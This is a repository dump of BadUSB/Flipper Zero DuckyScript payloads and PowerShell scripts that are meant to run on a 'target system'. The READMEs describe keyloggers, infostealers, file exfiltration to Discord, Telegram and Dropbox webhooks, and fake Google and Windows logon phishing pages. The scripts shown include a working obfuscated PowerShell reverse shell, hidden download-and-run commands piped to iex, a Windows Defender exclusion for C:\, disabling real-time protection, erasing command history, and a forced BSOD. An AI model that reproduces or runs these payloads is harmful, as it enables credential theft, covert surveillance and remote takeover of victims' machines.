├── Network-Enumeration-GUI ├── README.md └── Network-Enumeration-GUI.txt ├── GIF-Player ├── README.md ├── Gif-Player.txt └── main.ps1 ├── US-Keyboard-Layout ├── README.md ├── US-Keyboard.txt └── main.ps1 ├── Screen-to-Discord ├── README.md ├── Screenshot-to-Discord.txt └── main.ps1 ├── Screen-to-Telegram ├── README.md ├── Screenshot-to-Telegram.txt └── main.ps1 ├── Filetype-Organizer ├── README.md ├── Filetype-Organizer.txt └── main.ps1 ├── MEMZ-In-Powershell ├── memz.vbs └── MEMZ-In-Powershell.txt ├── Windows-Idiot-Prank ├── idiot.vbs ├── Windows-Idiot-Prank.txt └── main.ps1 ├── Computer-Acid ├── README.md └── Computer-ACID-Prank.txt ├── Shortcut-Spam ├── README.md ├── Desktop-Shortcut-Spam.txt └── main.ps1 ├── Wallpaper-Jumpscare ├── README.md ├── Wallpaper-Jumpscare.txt └── main.ps1 ├── Download-and-Execute ├── README.md └── Download-Execute.txt ├── Clean-History ├── README.md ├── main.ps1 └── Clean-History.txt ├── File-Monitor-to-Discord ├── README.md ├── File-Changes-to-Discord.txt └── main.ps1 ├── Mouse-Monitor-to-Discord ├── README.md ├── Mouse-Activity-to-Discord.txt └── main.ps1 ├── Social-Search-GUI ├── README.md └── Username-Search-GUI.txt ├── Discord-Infostealer ├── README.md └── System-Info-to-Discord.txt ├── Webhook-Spammer-GUI ├── README.md └── Webhook-Spammer-GUI.txt ├── Browser-History-to-Discord ├── README.md ├── Browser-History-to-Discord.txt └── main.ps1 ├── Exfiltrate-to-Discord ├── README.md ├── Exfiltrate-to-Discord.txt └── main.ps1 ├── Google-Phishing ├── README.md └── Google-Phish-to-Discord.txt ├── Wifi-Networks-to-Discord ├── README.md ├── Discord-WiFi-Grabber.txt └── main.ps1 ├── Record-Screen-GUI ├── README.md └── Record-Screen-GUI.txt ├── Win10-Phishing ├── README.md └── Fake-Windows-10-Logon.txt ├── Win11-Phishing ├── README.md └── Fake-Windows-11-Logon.txt ├── Telegram-Keylogger ├── README.md ├── Keylogger-to-Telegram.txt └── main.ps1 ├── Tools ├── Webhook-Test-Tool.txt ├── Add Exclusion C-drive.txt ├── Downgrade-PS-Win11.txt ├── Disable RT-Protection through GUI.txt ├── Anti-AFK-Tool.txt ├── Update Windows in Powershell.txt ├── Download-Execute from Run Prompt.txt ├── Set US Keyboard & System Language.txt ├── Clean-Command-History.txt └── Base64 Decode & Execute.txt ├── Discord-Keylogger ├── README.md ├── Keylogger-to-Discord.txt └── main.ps1 ├── Pranks ├── Invoke BSOD.txt ├── ScreenParty.txt ├── Computer-ACID-Prank.txt ├── Start Windows-93 (parody edition).txt ├── System Message.txt ├── 5 second Screen Kill.txt ├── Disable-Keyboard-Mouse-120s.txt ├── Persisant-Goose.txt ├── Kill I-O Devices.txt ├── Mute-Button-Spam.txt ├── Change-System-Sounds.txt ├── USB-SoundSwap.txt ├── Invoke Fake Update (.vbs).txt ├── Dsktop Shortcut Spammer.txt ├── Rickroll with Max Volume spam.txt ├── Change Wallpaper.txt ├── Blank Image to Discord Spammer.txt ├── Mario-BSOD.txt └── Hydra-in-Powershell.txt ├── Netcat-Screenshare ├── README.md ├── Desktop Screenshare over Netcat.txt └── main.ps1 ├── Beigeworms-Tool-Suite ├── README.md └── Beigeworms-Tool-Suite.txt ├── Exfiltrate-to-Telegram ├── README.md ├── Exfiltrate-to-Telegram.txt └── main.ps1 ├── Console-QRcode ├── Console-QRcode.txt └── main.ps1 ├── Netcat-Client ├── main.ps1 ├── README.md └── Simple-Netcat-Client.txt ├── Telegram-Infostealer ├── README.md └── System-Info-to-Telegram.txt ├── Exfiltrate-to-USB ├── README.md ├── Exfiltrate-to-USB.txt └── main.ps1 ├── LAN-Tools ├── README.md └── LAN-Tools.txt ├── Exfiltrate-to-Dropbox ├── README.md ├── Exfiltrate-to-Dropbox.txt └── main.ps1 ├── Global-PS-Trascription-to-Discord └── Global-PS-Trascript-to-DC.txt ├── Webcam-to-Discord ├── Webcam-to-Discord.txt └── main.ps1 ├── Image-to-Console ├── Image-to-Console.txt └── main.ps1 ├── Speech-to-Discord ├── Speech-to-Discord.txt └── main.ps1 ├── Chrome-Extension-Keylogger ├── README.md ├── Chrome-Extension-Keylogger.txt └── main.ps1 ├── Record-Screen-to-Discord ├── Record-Screen-to-Discord.txt └── main.ps1 ├── USB-Poison ├── USB-Poison.txt └── main.ps1 ├── Record-Mic-to-Discord ├── Record-Mic-to-Discord.txt └── main.ps1 ├── Mouse-Clicks-Recorder └── Mouse-Clicks-Recorder.txt ├── Uvnc-Remote-Desktop ├── Uvnc-Remote-Desktop.txt └── main.ps1 ├── Voice-Activated-DarkMode ├── Voice-Activated-DarkMode.txt └── main.ps1 ├── OSINT ├── Discord WiFi Grabber 2.txt ├── Discord WiFi Grabber.txt ├── Speech-to-Discord.txt.txt ├── Record-Screen-to-Discord.txt.txt ├── Installed Programs and Eventlogs to File.txt ├── Exfiltrate files to DropBox.txt ├── Screenshot to Telegram.txt ├── Exfiltrate files to Discord.txt ├── Exfiltrate Files to USB Drive.txt ├── Google Login Phish to Discord.txt ├── Record-Mic-to-Discord.txt.txt ├── Keylogger to Discord.txt ├── Desktop Screenshare over Netcat.txt ├── Keylogger from base64 to Discord.txt ├── Exfiltrate files to Telegram.txt ├── Email System & User Information.txt ├── Desktop Screenshare over LAN.txt └── Email System Info with Screenshot.txt ├── Chrome-DB-to-Discord ├── Chrome-DB-to-Discord.txt └── main.ps1 ├── Discord-Media-Hog ├── Discord-Media-Hog.txt └── readme.md ├── Unsaved-Notepad-to-Discord ├── Notepad-Tabs-to-Discord.txt └── main.ps1 ├── BadUSB-Detect-and-Protect ├── README.md └── BadUSB-Detect-and-Protect.txt ├── Discord-C2 ├── Discord C2 Client.txt └── README.md ├── Discord-Reverse-Shell └── Discord-Reverse-Shell.txt ├── Reverse Shells and C2 ├── Simple NetCat Client.txt └── Telegram Reverse Shell.txt └── README.md /Network-Enumeration-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Network Enumeration GUI

3 | 4 | SYNOPSIS 5 | 6 | This script creates a GUI window for enumerating devices on the local network. 7 | -------------------------------------------------------------------------------- /GIF-Player/README.md: -------------------------------------------------------------------------------- 1 | 2 |

GIF Player in Powershell

3 | 4 | SYNOPSIS 5 | 6 | This Script downloads a GIF from Giphy and plays it in a GUI window. 7 | 8 | USAGE 9 | 10 | 1. Run this script in powershell 11 | -------------------------------------------------------------------------------- /US-Keyboard-Layout/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Set US Keyboard Layout

3 | 4 | SYNOPSIS 5 | 6 | This script changes the keyboard layout and system language to US. 7 | 8 | USAGE 9 | 10 | 1. Run the script on a target system -------------------------------------------------------------------------------- /Screen-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Discord

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a discord webhook. 7 | 8 | SETUP 9 | 10 | 1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 11 | -------------------------------------------------------------------------------- /Screen-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Telegram

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a Telegram bot chat. 7 | 8 | SETUP 9 | 10 | 1. replace TELEGRAM_TOKEN_HERE with your Telegram token. 11 | -------------------------------------------------------------------------------- /Filetype-Organizer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Search Folders For Filetypes

3 | 4 | SYNOPSIS 5 | 6 | Searches User folder for any files with specific filetype and copies them. 7 | 8 | USAGE 9 | 10 | 1. Run Script. 11 | 2. follow instructions in the console. -------------------------------------------------------------------------------- /MEMZ-In-Powershell/memz.vbs: -------------------------------------------------------------------------------- 1 | Set WshShell = WScript.CreateObject("WScript.Shell") 2 | WScript.Sleep 200 3 | WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True 4 | 5 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/idiot.vbs: -------------------------------------------------------------------------------- 1 | Set WshShell = WScript.CreateObject("WScript.Shell") 2 | WScript.Sleep 200 3 | WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | i`ex", 0, True 4 | 5 | -------------------------------------------------------------------------------- /Computer-Acid/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Computer Acid Prank

3 | 4 | SYNOPSIS 5 | 6 | this script generates GDI effects (VISUAL EFFECTS) on the desktop 7 | (lasts for 90 seconds before returning to normal) 8 | 9 | USAGE 10 | 11 | 1. Run script with powershell -------------------------------------------------------------------------------- /Shortcut-Spam/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Shortcut Bomb

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script will create 200 shortcuts on the desktop very quickly. 8 | 9 | USAGE 10 | 11 | 1. Change '100' to the number of shortcuts you want created 12 | 2. Run the script. -------------------------------------------------------------------------------- /Wallpaper-Jumpscare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Wallpaper Changer

3 | 4 | SYNOPSIS 5 | 6 | This script will download an image from the web and set it as the wallpaper. 7 | 8 | USAGE 9 | 10 | 1. Change DIRECT IMAGE LINK HERE to your URL. 11 | 2. Run the script. 12 | -------------------------------------------------------------------------------- /Download-and-Execute/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Download and Execute exe files

3 | 4 | SYNOPSIS 5 | 6 | Uses the Run Prompt to download a file and run it. 7 | 8 | USAGE 9 | 10 | replace FILE_URL_HERE with the url of your file to run. 11 | Run script on target Windows system. 12 | -------------------------------------------------------------------------------- /Clean-History/README.md: -------------------------------------------------------------------------------- 1 | 2 |

History Cleaner

3 | 4 | SYNOPSIS 5 | Empty the temp folder and recycle bin, clear run box and powershell history. 6 | 7 | USAGE 8 | 1. Run the script 9 | 10 | CREDIT 11 | this code was pulled from I-Am-Jakoby's recon script. 12 | 13 | #> 14 | -------------------------------------------------------------------------------- /File-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Filesystem Monitor to discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any changes to any files in the "%USERPROFILE% folder". 7 | 8 | USAGE 9 | 2. Run Script on target System 10 | 3. Check temp folder for results 11 | -------------------------------------------------------------------------------- /Mouse-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Mouse Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any mouse movement and idletime and sends info to Discord". 7 | 8 | USAGE 9 | 10 | 2. Run Script on target System 11 | 3. Check Discord for results 12 | -------------------------------------------------------------------------------- /Social-Search-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Social Search GUI

3 | 4 | SYNOPSIS 5 | 6 | This script presents a GUI for searching popular websites with a single username.. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input your desired username 12 | 3. Press "Start Search" 13 | -------------------------------------------------------------------------------- /Discord-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Discord Webhook with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 4. Replace DISCORD_WEBHOOK with your webhook 11 | 5. Run Script on target System 12 | -------------------------------------------------------------------------------- /Webhook-Spammer-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Discord Spammer With GUI

3 | 4 | SYNOPSIS 5 | 6 | Creates a GUI with functionality to spam a webhook with text or an image. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input ip Range and select additional parameters 12 | 3. Press "Start Scan" 13 | -------------------------------------------------------------------------------- /Browser-History-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Browser History and Bookmarks to Discord

3 | 4 | SYNOPSIS 5 | 6 | Gathers History and Bookmarks data from database files and sends it to discord 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBHOOK_HERE with your Discord webhook. 11 | 2. Run the script and check Discord for results. -------------------------------------------------------------------------------- /Exfiltrate-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script searches the user folders for specific filetypes to upload to Discord zipped. 7 | 8 | SETUP 9 | 10 | Create a webhook in a discord server channel settings. 11 | Replace WEBHOOK_HERE with your webhook. 12 | 13 | -------------------------------------------------------------------------------- /Google-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Google Sign in to Discord

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook. 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook 11 | 2. Run script on target system. 12 | -------------------------------------------------------------------------------- /Wifi-Networks-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Saved Wifi Networks to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers WiFi information and posts to a discord webhook address with the results. 7 | 8 | USAGE 9 | 10 | 1. Input your credentials below 11 | 2. Run Script on target System 12 | 3. Check Discord for results 13 | 14 | -------------------------------------------------------------------------------- /Record-Screen-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screen Recorder GUI

3 | 4 | SYNOPSIS 5 | 6 | A customizable gui for screen recording with ffmpeg.exe 7 | 8 | USAGE 9 | 10 | 1. Run script. 11 | 2. in GUI click 'Get ffmpeg.exe' 12 | 3. input desired variables and click start 13 | 4. Timestamped output file will be in the same folder as the script. 14 | -------------------------------------------------------------------------------- /Win10-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Win11-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Fake Windows Logon Screen to Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook. 8 | 9 | USAGE 10 | 11 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook. 12 | 2. Run script on target system. 13 | -------------------------------------------------------------------------------- /Telegram-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Telegram Chat

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to capture keystrokes. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 5. Run Script on target System 14 | -------------------------------------------------------------------------------- /Tools/Webhook-Test-Tool.txt: -------------------------------------------------------------------------------- 1 | REM Title: Webhook Test Tool 2 | REM Author: @beigeworm 3 | REM Description: This script sends a test message a webhook url from run-prompt 4 | REM Target: Windows 10 , 11 5 | 6 | DELAY 1000 7 | GUI r 8 | DELAY 750 9 | STRING powershell -Ep Bypass $b = @{\"content\" = \"WORKING!\"} | ConvertTo-Json; IRM 'https://discord.com/api/webhooks/REPLACE_WITH/YOUR_WEBHOOK' -Me Post -Co 'application/json' -B $b 10 | ENTER -------------------------------------------------------------------------------- /Discord-Keylogger/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Keylogger To Discord Webhook

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script gathers Keypress information and posts to a discord webhook address with the results only 8 | when the keyboard is inactive for more than 10 seconds and only if keys were pressed before that. 9 | 10 | USAGE 11 | 12 | 1. Input your credentials below 13 | 2. Run Script on target System 14 | 3. Check Discord for results 15 | -------------------------------------------------------------------------------- /Clean-History/main.ps1: -------------------------------------------------------------------------------- 1 | # Delete contents of Temp folder 2 | 3 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 4 | 5 | # Delete run box history 6 | 7 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 8 | 9 | # Delete powershell history 10 | 11 | Remove-Item (Get-PSreadlineOption).HistorySavePath 12 | 13 | # Deletes contents of recycle bin 14 | 15 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /Pranks/Invoke BSOD.txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke BSOD 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: This will open powershell and cause a blue screen. 4 | REM Target: Windows 10 5 | 6 | REM ***This is a dangerous script - Be Careful!!!*** 7 | 8 | REM some setup for dukie script. 9 | DEFAULT_DELAY 100 10 | 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING cmd /c taskkill /f /im svchost.exe 15 | CTRL-SHIFT ENTER 16 | DELAY 2500 17 | ALT y 18 | -------------------------------------------------------------------------------- /Netcat-Screenshare/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Desktop Screensahre Over Netcat

3 | 4 | SYNOPSIS 5 | 6 | Starts a video stream of the desktop to a netcat session (the output is viewed in a browser.) 7 | 8 | USAGE 9 | 10 | Run script on target Windows system. 11 | On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 12 | Then in a firefox browser goto > http://localhost:8080 13 | 14 | (Firefox is the only browser that supports the codec for the video stream..) -------------------------------------------------------------------------------- /Beigeworms-Tool-Suite/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Toolset GUI

3 | 4 | SYNOPSIS 5 | 6 | All useful tools in one place. 7 | A selection of Powershell tools from this repo can be ran from this script. 8 | 9 | USAGE 10 | 11 | 12 | 1. Run the script and follow options in the GUI 13 | 14 | INFO 15 | 16 | Closing this script will NOT close any scripts that were started from this script. 17 | Any background/hidden scripts eg. C2 clients will keep running. 18 | -------------------------------------------------------------------------------- /Exfiltrate-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Telegram

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to upload certain files to telegram . 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace TELEGRAM_TOKEN with your token 14 | 5. Run Script on target System -------------------------------------------------------------------------------- /Console-QRcode/Console-QRcode.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: beigeworm's QR code to console. 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to display a generated QR code from text or a URL 5 | REM Target: Windows 10 and 11 6 | 7 | REM SETUP 8 | REM Replace https://beigeworm.com with your url ot text string. 9 | 10 | DEFAULT_DELAY 100 11 | 12 | DELAY 1000 13 | GUI r 14 | DELAY 750 15 | STRING powershell -Ep Bypass -C $txt = 'https://beigeworm.com'; irm is.gd/bw0psqrcode | iex 16 | ENTER 17 | -------------------------------------------------------------------------------- /Netcat-Client/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | do{ 3 | $v = 4 4 | $a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444) 5 | $b = $a.GetStream();[byte[]]$c = 0..65535|%{0} 6 | while(($d = $b.Read($c, 0, $c.Length)) -ne 0){ 7 | $e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 8 | $f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ' 9 | $h = ([text.encoding]::ASCII).GetBytes($g) 10 | $b.Write($h,0,$h.Length) 11 | $b.Flush()} 12 | $a.Close() 13 | Sleep 10 14 | }while ($v -le 5) 15 | -------------------------------------------------------------------------------- /Telegram-Infostealer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Telegram System InfoStealer

3 | 4 | SYNOPSIS 5 | 6 | This script gathers system information and posts to Telegram Bot Chat with the results. 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace YOUR_BOT_TOKEN_FOR_TELEGRAM with your bot token 14 | 5. Run Script on target System 15 | -------------------------------------------------------------------------------- /Netcat-Client/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Netcat Client

3 | 4 | SYNOPSIS 5 | 6 | Opens a netcat connection to a Windows machine in Powershell 7 | 8 | USAGE 9 | 10 | 1. Download Ncat For windows. https://nmap.org/download#windows 11 | 2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows) 12 | 3. Open a terminal on the attacker machine and type "nc -lvp 4444" 13 | 4. Run this script on the client machine. 14 | 15 | NOTE 16 | 17 | The PORT number is 4444 -------------------------------------------------------------------------------- /Pranks/ScreenParty.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screen Party 3 | REM Author: @beigeworm 4 | REM Description: Uses Powershell to display a form with changing colors 5 | REM Target: Windows 10 and 11 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove "-W H" to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Pranks/Screen-Party.ps1 | iex 15 | ENTER -------------------------------------------------------------------------------- /Exfiltrate-to-USB/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to USB

3 | 4 | SYNOPSIS 5 | 6 | Waits for a new USB Storage device to be connected and then copies many user files to that USB drive. 7 | 8 | USAGE 9 | 10 | 1. Run the script. 11 | 2. Choose if you want to hide the console window (silent mode) 12 | 3. Connect a USB Drive to the computer 13 | 4. Copying files will automatically begin to the newly connected drive 14 | 5. 'Completed' message will appear when finished (hidden mode only) 15 | 16 | -------------------------------------------------------------------------------- /LAN-Tools/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Powershell LAN Toolset

3 | 4 | MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN 5 | 6 | SYNOPSIS 7 | 8 | Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 9 | 10 | USAGE 11 | 12 | 1. Run this script on target computer and note the URL provided 13 | 2. on another device on the same network, enter the provided URL in a browser window 14 | 15 | NOTE 16 | 17 | This script will need Admin privaleges to run properly. 18 | -------------------------------------------------------------------------------- /Tools/Add Exclusion C-drive.txt: -------------------------------------------------------------------------------- 1 | REM Title: Add Exclusion C-drive 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\ 13 | CTRL-SHIFT ENTER 14 | DELAY 2500 15 | ALT y 16 | -------------------------------------------------------------------------------- /Tools/Downgrade-PS-Win11.txt: -------------------------------------------------------------------------------- 1 | REM Title: Windows 11 Terminal Downgrade 2 | REM Description: Downgrade the default command prompt of Windows 11 to use Conhost again. Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again. 3 | REM Target: Windows 11 4 | 5 | DELAY 500 6 | GUI r 7 | DELAY 500 8 | STRING powershell -Ep Bypass -C $k='HKCU:\Console\%%Startup';$v='{B23D10C0-E52E-411E-9D5B-C09FDF709C7D}';Set-ItemProperty $k -N DelegationConsole -V $v;Set-ItemProperty $k -N DelegationTerminal -V $v 9 | DELAY 500 10 | ENTER 11 | -------------------------------------------------------------------------------- /US-Keyboard-Layout/US-Keyboard.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Keyboard Language changer. 2 | REM Author: @beigeworm 3 | REM Description: This script changes the keyboard layout and system language to US. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -ep bypass -w h -c cd $env:temp; irm is.gd/6hrsg4r > run.ps1; & run.ps1; sleep 1; rm run.ps1 -force 14 | ENTER 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /Tools/Disable RT-Protection through GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: Disable Real-Time Protection 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. 4 | REM Target: Windows 10 5 | 6 | 7 | REM some setup for dukie script. 8 | DEFAULT_DELAY 100 9 | 10 | REM open Windows Security GUI. 11 | GUI r 12 | DELAY 1000 13 | STRING windowsdefender://threatsettings 14 | ENTER 15 | DELAY 5000 16 | SPACE 17 | DELAY 3000 18 | ALT y 19 | DELAY 1000 20 | ALT F4 21 | 22 | -------------------------------------------------------------------------------- /Exfiltrate-to-Dropbox/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Dropbox

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 7 | 8 | SETUP 9 | 10 | make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 11 | generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 12 | 13 | USAGE 14 | 15 | 1. Input your credentials below 16 | 2. Run Script on target System 17 | 3. Check Discord for results 18 | 19 | #> -------------------------------------------------------------------------------- /GIF-Player/Gif-Player.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's GIF Player. 2 | REM Author: @beigeworm 3 | REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/GIF-Player/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Pranks/Computer-ACID-Prank.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's GDI Effects Prank. 2 | REM Author: @beigeworm 3 | REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GDI-haunter.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/Windows-Idiot-Prank.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Windows Idiot Prank 3 | REM Author: @beigeworm 4 | REM Description: This script recreates the Windows idiot virus in powershell 5 | REM Target: Windows 10 6 | 7 | REM some setup for dukie script 8 | DEFAULT_DELAY 100 9 | 10 | REM open powershell (remove -W Hidden to show the window) 11 | DELAY 1000 12 | GUI r 13 | DELAY 750 14 | STRING powershell -Ep Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | iex 15 | ENTER 16 | 17 | 18 | -------------------------------------------------------------------------------- /Shortcut-Spam/Desktop-Shortcut-Spam.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Shortcut Spammer. 2 | REM Author: @beigeworm 3 | REM Description: This script creates 100 shortcuts on the users Desktop. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Shortcut-Spam/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Global-PS-Trascription-to-Discord/Global-PS-Trascript-to-DC.txt: -------------------------------------------------------------------------------- 1 | REM Title: Global PS Trascription to Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Log all powershell input and output to a discord webhook 4 | REM Target: Windows 10, 11 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -W H -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; irm is.gd/bw0pstrtodc | iex 13 | CTRL-SHIFT ENTER 14 | DELAY 2500 15 | ALT y 16 | -------------------------------------------------------------------------------- /LAN-Tools/LAN-Tools.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's LAN Tools 2 | REM Author: @beigeworm 3 | REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 4 | REM NOTE - This script will need Admin privileges to run properly. 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 